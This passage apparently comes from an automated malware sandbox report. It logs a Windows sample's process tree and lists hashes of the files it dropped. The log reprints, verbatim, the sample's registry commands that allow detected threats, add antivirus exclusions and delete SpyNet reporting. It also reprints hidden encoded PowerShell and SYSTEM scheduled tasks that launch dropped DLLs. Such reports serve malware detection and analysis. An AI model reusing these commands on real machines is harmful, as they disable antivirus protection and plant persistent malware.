Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1872
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4056
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FtCSCKapluTyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FtCSCKapluTyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eTQrVVcbPeUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eTQrVVcbPeUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZLmQfqCTfSU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZLmQfqCTfSU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ptIyuvGcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ptIyuvGcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HlgLlrmAHxInKQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HlgLlrmAHxInKQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\itLWlUfoycYRNPTF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\itLWlUfoycYRNPTF\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:323⤵PID:4180
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:324⤵PID:2340
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:643⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:323⤵PID:936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:643⤵PID:3740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:323⤵PID:2460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:643⤵PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:323⤵PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:643⤵PID:2324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:323⤵PID:4248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:643⤵PID:4744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HlgLlrmAHxInKQVB /t REG_DWORD /d 0 /reg:323⤵PID:3120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HlgLlrmAHxInKQVB /t REG_DWORD /d 0 /reg:643⤵PID:4232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi /t REG_DWORD /d 0 /reg:323⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi /t REG_DWORD /d 0 /reg:643⤵PID:4916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\itLWlUfoycYRNPTF /t REG_DWORD /d 0 /reg:323⤵PID:3848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\itLWlUfoycYRNPTF /t REG_DWORD /d 0 /reg:643⤵PID:2496
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAjsLBEBI" /SC once /ST 20:07:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAjsLBEBI"2⤵PID:4272
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAjsLBEBI"2⤵PID:2356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PiYQFbjPeBiHsXAGG" /SC once /ST 03:18:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\itLWlUfoycYRNPTF\XAZgXenoCHwNxvH\STYRYMW.exe\" sH /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PiYQFbjPeBiHsXAGG"2⤵PID:1480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4508
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4616
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5008
-
C:\Windows\Temp\itLWlUfoycYRNPTF\XAZgXenoCHwNxvH\STYRYMW.exeC:\Windows\Temp\itLWlUfoycYRNPTF\XAZgXenoCHwNxvH\STYRYMW.exe sH /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3372 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhLXEjHxBtkbbNqWSu"2⤵PID:2868
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1280
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1248
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3732
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ptIyuvGcU\UDoUZr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IUuCIySJJwGxjXb" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IUuCIySJJwGxjXb2" /F /xml "C:\Program Files (x86)\ptIyuvGcU\evRMuqs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "IUuCIySJJwGxjXb"2⤵PID:4116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IUuCIySJJwGxjXb"2⤵PID:4600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kMyEUPrYFjddqT" /F /xml "C:\Program Files (x86)\oZLmQfqCTfSU2\pmwcfIR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HZHhxLcwZcwlr2" /F /xml "C:\ProgramData\HlgLlrmAHxInKQVB\ZtkKqzS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sOaBGDTyDgDnoKhkO2" /F /xml "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR\AivdEls.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hqzorlbWuXsaxlnqqDd2" /F /xml "C:\Program Files (x86)\FtCSCKapluTyC\OVcSajc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mNPFWxOQLftKPxeaH" /SC once /ST 03:24:26 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\itLWlUfoycYRNPTF\vQJvulxA\AXsGDsw.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mNPFWxOQLftKPxeaH"2⤵PID:4264
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2496
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3636
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\itLWlUfoycYRNPTF\vQJvulxA\AXsGDsw.dll",#1 /site_id 5254031⤵PID:4804
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\itLWlUfoycYRNPTF\vQJvulxA\AXsGDsw.dll",#1 /site_id 5254032⤵
- Loads dropped DLL
PID:4684
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5185648b4432bab71ae35cf180f16b326
SHA17ec24a787f959d804b6edeb6a5cb218dd860e0e3
SHA256d56f5ae31b24ceb35d2899217b9f76185e94c2ea16527c9c7318748514c53656
SHA51246446e8e5a39239cb644ff4a0ff53f82c0c540d335033cdb4fc73100c9c9e4433e77aa684053a7ae48bfb3058bc07af47b05a2588a5dfb59a8e68326184429b1
-
Filesize
2KB
MD5e1a27ac30f02472e37f97ec079e2f0d8
SHA14cb7e46b018db137deba08c3b48f560a20e70846
SHA256210a3cdf44d31ccf2c89f5c9c20d1eed4e5168853110ab2eecc7b4176b728991
SHA512f1df4272f3ac1be1298f050805b6ace1b63007b444473abfa428d647a31d3e6495e0769fb5c38d798ed8b5610ed4a25290d11fb3c1783416cbe017d3aec622db
-
Filesize
2KB
MD51defd348c6b3b13f893b1315c3a9c837
SHA1c6bd6087a24425251078b918a243086f1dd3fdb2
SHA256c158c7bc76c64b138e861b6da06b6842d7e0a703ff5d866a7d947d58370bcef0
SHA512c69f72bbd727fc579f80eedb96f55f07170a7f9ac6e3a085c2fc826b33e9cb9223b37957e3e89569fdc5f62abd174e7a8f51584d918e2da11ec4dcba83e72765
-
Filesize
2KB
MD5e2cbbb89cf8e9c6463e9302f6b0405d7
SHA11f04af151c228e6510aa68dac8fa958fbab96efd
SHA256450e857d3192f07c683f947142c51c27a343028bcb3c60e56d44c31d0f5d00bc
SHA512845158acf0a50fd7d468e260176a62b4ac41ccac4ca6e506198710e59f6911691c22ab14b8234f2ec1be6befbe93a07ded3f417375ddea41420bf1fd62cc6a62
-
Filesize
2KB
MD5d0fe4e6682d21d4ade1fee50fb11ddf2
SHA1315cfd5fc5514d2630c042d00d7406dfaada3326
SHA256a3c65e7cbd6b9a88064abd1fef9888f0a0b82ece90bc7d40b4e1a50fa1c0c677
SHA512ab72e1a81c0399ce9f0ba2b5e4cff2abb343fd28a1a771d92822cd8cf1a09d8358c86607d3e1fbd804281678e511013a6392cc3019352d86e8bccff7dfed9876
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
6.3MB
MD56ca257217ce35a8c709b081c490f0d6d
SHA1678567826335e34a5a656144fa119221ab75772e
SHA256d9874b4c2c84a61353e38435537fd3c3eca0c1b1ed78f3ad288c0ac9a2ad62d3
SHA512461e6ff523ffd14e72de7d48d2ae5d4cc9663dba1feb22fa62de092a9db53b157bb763c1ddf5ba572b34b6feeaf9661272146b6bba2df1eb0e8d75c5a2887eae
-
Filesize
6.3MB
MD56ca257217ce35a8c709b081c490f0d6d
SHA1678567826335e34a5a656144fa119221ab75772e
SHA256d9874b4c2c84a61353e38435537fd3c3eca0c1b1ed78f3ad288c0ac9a2ad62d3
SHA512461e6ff523ffd14e72de7d48d2ae5d4cc9663dba1feb22fa62de092a9db53b157bb763c1ddf5ba572b34b6feeaf9661272146b6bba2df1eb0e8d75c5a2887eae
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
